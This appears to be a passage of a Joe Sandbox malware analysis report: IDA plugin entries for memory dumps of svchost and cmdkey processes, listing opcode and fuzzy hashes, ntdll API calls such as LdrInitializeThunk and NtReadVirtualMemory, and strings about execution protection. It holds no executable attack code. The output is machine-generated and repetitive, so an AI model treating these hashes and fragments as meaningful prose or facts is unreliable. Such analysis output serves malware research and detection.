                                                                                      • API String ID:
                                                                                      • Opcode ID: 6182b68b6dc2e6c0655cda6c70603741d1cdb75813c3025d1f957237214f5167
                                                                                      • Instruction ID: 3e3fe3eacdf8f6acea1338325f64e96570c665b8be07748ec522c4d46ab74447
                                                                                      • Opcode Fuzzy Hash: 6182b68b6dc2e6c0655cda6c70603741d1cdb75813c3025d1f957237214f5167
                                                                                      • Instruction Fuzzy Hash: E690022130100842D502B39845146060009C7D1345FD1C856E2418555DC7358957B132
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a685d7d0fef930e124332b88f66286cc7e216b2a3ea3416be9821af54a379c5
                                                                                      • Instruction ID: 3ce09ca79be9f001065de3415cf52cf0b1d1ffba12cd663356392086d2e9bba9
                                                                                      • Opcode Fuzzy Hash: 8a685d7d0fef930e124332b88f66286cc7e216b2a3ea3416be9821af54a379c5
                                                                                      • Instruction Fuzzy Hash: E890023124100842D541B3984504606000997D0341FD1C856A1418554EC7658A5ABA61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 348cc47a5c0c8f854fd2640aaa901c62882af5c003c1b6f141a9e556ef2c29c6
                                                                                      • Instruction ID: abe897e09e3470398774ad15d551ffa21bb01b87fd71d94877bee2cc1c8e66b9
                                                                                      • Opcode Fuzzy Hash: 348cc47a5c0c8f854fd2640aaa901c62882af5c003c1b6f141a9e556ef2c29c6
                                                                                      • Instruction Fuzzy Hash: 67900221242045925945F3984504507400697E03417D1C856A2408950CC636985AE621
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fa49a1ae0676c5c28430caca5569cb2d8d8d017f8f9c7beed85d376ec83295df
                                                                                      • Instruction ID: 55eef1d390e2fed41ac8fd20e610e5ce011ad4f3a18ac0dc04473dfefe573f0d
                                                                                      • Opcode Fuzzy Hash: fa49a1ae0676c5c28430caca5569cb2d8d8d017f8f9c7beed85d376ec83295df
                                                                                      • Instruction Fuzzy Hash: 3690023120100843D500B3985608707000587D0301F91DC55A1418558DD76688557121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42af7f215bc58359974f17c6397bc603c0526ee4a5ef64de74a1aadf83356a03
                                                                                      • Instruction ID: 8215ae1345305cc3c4174df1efb3ad80ba54fbe1febafdda1644505c040e9ebb
                                                                                      • Opcode Fuzzy Hash: 42af7f215bc58359974f17c6397bc603c0526ee4a5ef64de74a1aadf83356a03
                                                                                      • Instruction Fuzzy Hash: D290022120504882D500B7985508A06000587D0305F91D855A2058595DC7358855B131
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 587308d6b77743fedd1e925af15eb0c5197096acb228fe620cc76b1795f12c11
                                                                                      • Instruction ID: dce3300e5eeb8bf5099f2242b308c28b4e692327a8cc7fc78173c7fa34e661a0
                                                                                      • Opcode Fuzzy Hash: 587308d6b77743fedd1e925af15eb0c5197096acb228fe620cc76b1795f12c11
                                                                                      • Instruction Fuzzy Hash: 2590022921300442D580B398550860A000587D1302FD1DC59A1009558CCA25886D6321
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 362204a1de9bb39a41770120a60dfd596acbeb57471356d08a2cfe60d439d539
                                                                                      • Instruction ID: fc322caf65db0fc73f94facb1e15f33ed9a5f0d1e468d831f22bca5ebbd82fed
                                                                                      • Opcode Fuzzy Hash: 362204a1de9bb39a41770120a60dfd596acbeb57471356d08a2cfe60d439d539
                                                                                      • Instruction Fuzzy Hash: 4590022130100443D540B39855186064005D7E1301F91D855E1408554CDA25885A6222
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8222decd9b532a1d23ff1c3b2cfa81f1812530919539a537e664267a4107e768
                                                                                      • Instruction ID: 428af78d28e934f7de35f83145fcdb85ab694470b65c839bfc00f0aaaa1983cb
                                                                                      • Opcode Fuzzy Hash: 8222decd9b532a1d23ff1c3b2cfa81f1812530919539a537e664267a4107e768
                                                                                      • Instruction Fuzzy Hash: F090022124505542D550B39C45046164005A7E0301F91C865A1808594DC66588597221
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5df6adbbf0513a2b42e62cc8b4c21ea161d97b63abc2d83271a597aecb964434
                                                                                      • Instruction ID: ce7edc2241e45a0ee2206d08abab1c7b03c9a62e78c80fc928020d1c2687f29d
                                                                                      • Opcode Fuzzy Hash: 5df6adbbf0513a2b42e62cc8b4c21ea161d97b63abc2d83271a597aecb964434
                                                                                      • Instruction Fuzzy Hash: C090023520100842D910B3985904646004687D0301F91DC55A1418558DC76488A5B121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ada08f69768ca6b53dedd57fa91d7a55181413990891c6213a7effc36c1ecab
                                                                                      • Instruction ID: 358d95ea55721855658ccb8aed1c56c3098c3cc17d0cb215bab68de7cd1c3488
                                                                                      • Opcode Fuzzy Hash: 5ada08f69768ca6b53dedd57fa91d7a55181413990891c6213a7effc36c1ecab
                                                                                      • Instruction Fuzzy Hash: 89900231202005829940B3985904A4E410587E1302BD1DC59A1009554CCA2488656221
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction ID: d4bd6520683d65c44b28c87a41a7456ed65e68ebbc9e99acc6239583bc0fdbc3
                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 038A4592
                                                                                      • Execute=1, xrefs: 038A451E
                                                                                      • ExecuteOptions, xrefs: 038A44AB
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038A454D
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038A4460
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038A4530
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038A4507
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: 6f93427dce78b1753b5a0525775676a712fb90f0a0a872b5b4f3346ddcae13ad
                                                                                      • Instruction ID: 3c05f42753da55892cece6f384b3af0f63d298be8f97c34d15c6d1910d0dfbc9
                                                                                      • Opcode Fuzzy Hash: 6f93427dce78b1753b5a0525775676a712fb90f0a0a872b5b4f3346ddcae13ad
                                                                                      • Instruction Fuzzy Hash: 2651DD35A003196AEF10EAD9EC59FED736DEF04708F0405E9E515EB281DB70DA45CB91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: 80605eb0cfe1acf5632b218dd36327f1606d23f71dc65ae9762f1b1790bc8e27
                                                                                      • Instruction ID: 6a65eced014ea4ab7f0dec7fff18cf60c126b8147e9cf6e7bf196078c3bfc073
                                                                                      • Opcode Fuzzy Hash: 80605eb0cfe1acf5632b218dd36327f1606d23f71dc65ae9762f1b1790bc8e27
                                                                                      • Instruction Fuzzy Hash: 7A813B76D00269DBDB31CB94CC44BEEB6B8AB48710F0445EAE91AF7250D7709E84CFA1

                                                                                      Execution Graph

                                                                                      Execution Coverage: 0.5%
                                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                                      Signature Coverage: 0%
                                                                                      Total number of Nodes: 45
                                                                                      Total number of Limit Nodes: 2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL ref: 0303F0E7
                                                                                      • NtReadVirtualMemory.NTDLL ref: 0303F1EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817352368.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3030000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                      • String ID: 0$vTd;
                                                                                      • API String ID: 1498878907-344068449
                                                                                      • Opcode ID: 2deb738232a90cf013e171ff241047587262a987c3884ba519dfaefcf981df23
                                                                                      • Instruction ID: 37b28ea1ec61ff7542fd484c382b4831aecece17affa14857b1c32dcfcef7535
                                                                                      • Opcode Fuzzy Hash: 2deb738232a90cf013e171ff241047587262a987c3884ba519dfaefcf981df23
                                                                                      • Instruction Fuzzy Hash: AA020E74519B8C8FCBA9EF68C894AEE77E5FF99304F00462A994AD7240DF34D641CB42
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1c7218f48fa0067f437b9813edf4d570b7bc09f3585b040f1e91a4f6feb67c84
                                                                                      • Instruction ID: eb88e68a39aa66cc1eec20957be6b1e48ec6bfa02e4bf5dc029d3978c7c1a724
                                                                                      • Opcode Fuzzy Hash: 1c7218f48fa0067f437b9813edf4d570b7bc09f3585b040f1e91a4f6feb67c84
                                                                                      • Instruction Fuzzy Hash: E590023161544413A540B1584AC45464005A7F4301B51C419E0425594CCB3489566371
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0a2c1e0b89be67b90a9cb9bf7cf5f906609532d92f04a440bf72e2d53450ef67
                                                                                      • Instruction ID: ce035bdd44b853c0f3d307a9ff6aed5bda0de8a08a2ad91e97674fdc8c3e6f99
                                                                                      • Opcode Fuzzy Hash: 0a2c1e0b89be67b90a9cb9bf7cf5f906609532d92f04a440bf72e2d53450ef67
                                                                                      • Instruction Fuzzy Hash: B9900261611144435540B1584A444066005A7F5301391C51DA05555A0CC7388855A279

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 143 31b2b10-31b2b1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 86a89c60eb2dd8ac19be9778a9f5afa58afdc5296c24fb74f258c7f9e9ec20f8
                                                                                      • Instruction ID: 711476be02dbe183cf34d54a8e6108063ff1bf9b5e7da20c0a89c297df5670a1
                                                                                      • Opcode Fuzzy Hash: 86a89c60eb2dd8ac19be9778a9f5afa58afdc5296c24fb74f258c7f9e9ec20f8
                                                                                      • Instruction Fuzzy Hash: BA90023121104C03E580B158464464A000597E5301F91C41DA0026694DCB358A5977B1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 142 31b2b00-31b2b0c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c8df52f23d691eed5c88d0376882a431dd2eb3bfd1db9db7188007bdc944be56
                                                                                      • Instruction ID: 2ae9b84019f7c44452d596ad2228bdd9ee706ca3ea2517ce2d17d5e39c36dbeb
                                                                                      • Opcode Fuzzy Hash: c8df52f23d691eed5c88d0376882a431dd2eb3bfd1db9db7188007bdc944be56
                                                                                      • Instruction Fuzzy Hash: CF90023121508C43E540B1584644A46001597E4305F51C419A00656D4DD7358D55B671

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 145 31b2b90-31b2b9c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2f43d6ef66938e6614ba7c4a550275bb7f7585f3355d43a1821c3ca85096dd01
                                                                                      • Instruction ID: 6a0337fb4e3dc05c5dc5b34e2c3f2bfc741c086ed2deb18aa18d7cf9413b64c8
                                                                                      • Opcode Fuzzy Hash: 2f43d6ef66938e6614ba7c4a550275bb7f7585f3355d43a1821c3ca85096dd01
                                                                                      • Instruction Fuzzy Hash: 929002312110CC03E510A158864474A000597E4301F55C819A4425698DC7B588917131

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 144 31b2b80-31b2b8c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d35f84ca9448142b6bb21f5105328ff9f44d1230e7b4b708c29b44f5a5a09bcc
                                                                                      • Instruction ID: 3553dcefaea567fb3b647bcd28d4d9b37b7b2436d931008b42e3026ce45764f4
                                                                                      • Opcode Fuzzy Hash: d35f84ca9448142b6bb21f5105328ff9f44d1230e7b4b708c29b44f5a5a09bcc
                                                                                      • Instruction Fuzzy Hash: F690023121104C43E500A1584644B46000597F4301F51C41EA0125694DC735C8517531

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 146 31b2bc0-31b2bcc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7c3f2f2cfe597c3e6664f885dc035e4d7ab7eb843dead1ec9a48e71f4ad307ca
                                                                                      • Instruction ID: 3429e01e1c935eee24fa68ef4557da7ea968ed46901093a4529e124dab56ca39
                                                                                      • Opcode Fuzzy Hash: 7c3f2f2cfe597c3e6664f885dc035e4d7ab7eb843dead1ec9a48e71f4ad307ca
                                                                                      • Instruction Fuzzy Hash: F190023121104803E500A5985648646000597F4301F51D419A5025595EC77588917131

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 31b2a10-31b2a1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 667301152422b035eed911aeea4ca8570a68ae7d0110eaded42f6b2b91c3c66f
                                                                                      • Instruction ID: 2c1582a88a60a90939e432978d0686517843fdd129bc813979f3342f72f3c870
                                                                                      • Opcode Fuzzy Hash: 667301152422b035eed911aeea4ca8570a68ae7d0110eaded42f6b2b91c3c66f
                                                                                      • Instruction Fuzzy Hash: 97900225231044031545E558074450B0445A7EA351391C41DF14175D0CC73188656331

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 140 31b2a80-31b2a8c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 58ae4ee9b334316315640e4f27457584919dcc249688aae4327741199260f140
                                                                                      • Instruction ID: ba94f2ff9dfbeb4cb944cdc80d1d6a940cf7c9d464aa4894ca2f271cd8554014
                                                                                      • Opcode Fuzzy Hash: 58ae4ee9b334316315640e4f27457584919dcc249688aae4327741199260f140
                                                                                      • Instruction Fuzzy Hash: 86900261212044035505B1584654616400A97F4201B51C429E10155D0DC73588917135

                                                                                      Control-flow Graph
                                                                                      control_flow_graph 141 31b2ac0-31b2acc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph
                                                                                      control_flow_graph 138 31b29f0-31b29fc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph
                                                                                      control_flow_graph 150 31b2d10-31b2d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

